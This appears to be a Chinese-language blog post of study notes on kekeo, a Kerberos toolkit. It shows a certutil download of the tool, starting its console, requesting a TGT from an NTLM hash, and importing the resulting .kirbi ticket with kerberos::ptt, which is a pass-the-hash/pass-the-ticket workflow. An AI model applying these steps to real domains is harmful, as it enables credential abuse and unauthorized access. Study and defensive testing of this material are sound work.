【笔记】kekeo学习笔记

发表于 更新于 阅读次数:

前言

kekeo is a little toolbox I have started to manipulate Microsoft Kerberos in C (and for fun)(维基百科

下载依赖

1
2
3
certutil -urlcache -split -f https://github.com/gentilkiwi/kekeo/releases/download/2.2.0-20211214/kekeo.zip
"C:\Program Files\7-Zip\7z.exe" x kekeo.zip -okekeo
cd kekeo

启动kekeo控制台

Windows x32

1
.\Win32\kekeo.exe
1
2
3
4
5
6
7
8
  ___ _    kekeo 2.1 (x86) built on Dec 14 2021 11:52:31
 /   ('>-  "A La Vie, A L'Amour"
 | K  |    /* * *
 \____/     Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
  L\_       https://blog.gentilkiwi.com/kekeo                (oe.eo)
                                             with 10 modules * * */

kekeo #

Windows x64

1
.\x64\kekeo.exe
1
2
3
4
5
6
7
8
  ___ _    kekeo 2.1 (x64) built on Dec 14 2021 11:51:55
 /   ('>-  "A La Vie, A L'Amour"
 | K  |    /* * *
 \____/     Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
  L\_       https://blog.gentilkiwi.com/kekeo                (oe.eo)
                                             with 10 modules * * */

kekeo #

启动kekeo控制台后立即执行命令

  • 可以在启动kekeo控制台后立即执行多条命令
1
.\kekeo.exe <cmd_1> <cmd_2>

退出kekeo控制台

1
kekeo exit

生成凭据

1
kekeo tgt::ask /domain:<domain> /user:<username> /ntlm:<hash>
  • 在当前文件夹下会生成<file>.kirbi文件

查看内存中的所有凭据(可选)

1
klist

清除内存中的所有凭据(可选)

1
klist purge

导入凭据

<file>.kirbi:上一步骤生成的凭据文件

1
kekeo kerberos::ptt <file>.kirbi

完成